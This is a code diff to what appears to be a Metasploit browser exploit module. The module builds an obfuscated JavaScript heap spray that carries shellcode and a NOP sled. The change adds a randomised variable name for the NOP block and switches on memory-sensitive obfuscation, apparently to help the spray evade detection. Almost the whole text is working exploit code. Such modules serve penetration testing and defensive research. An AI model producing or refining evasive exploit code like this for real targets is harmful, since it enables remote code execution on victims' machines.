@@ -90,12 +90,14 @@ class MetasploitModule < Msf::Exploit::Remote
     mytarget   = auto_target(cli, request)
     var_title  = rand_text_alpha(rand(100) + 1)
     func_main  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     heapspray = ::Rex::Exploitation::JSObfu.new %Q|
 function heapspray()
 {
   shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
-  var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}");
+  var #{randnop} = "#{Rex::Text.to_unescape(make_nops(4))}";
+  var bigblock = unescape(#{randnop});
   var headersize = 20;
   var slackspace = headersize + shellcode.length;
   while (bigblock.length < slackspace) bigblock += bigblock;
@@ -116,7 +118,7 @@ function heapspray()
   prompt(fillmem, "");
 }
 |
-    heapspray.obfuscate
+    heapspray.obfuscate(memory_sensitive: true)
 
     nofunc = ::Rex::Exploitation::JSObfu.new %Q|
 
@@ -150,7 +152,7 @@ else
 }
 |
 
-    nofunc.obfuscate
+    nofunc.obfuscate(memory_sensitive: true)
 
     main = %Q|
 function #{func_main}()
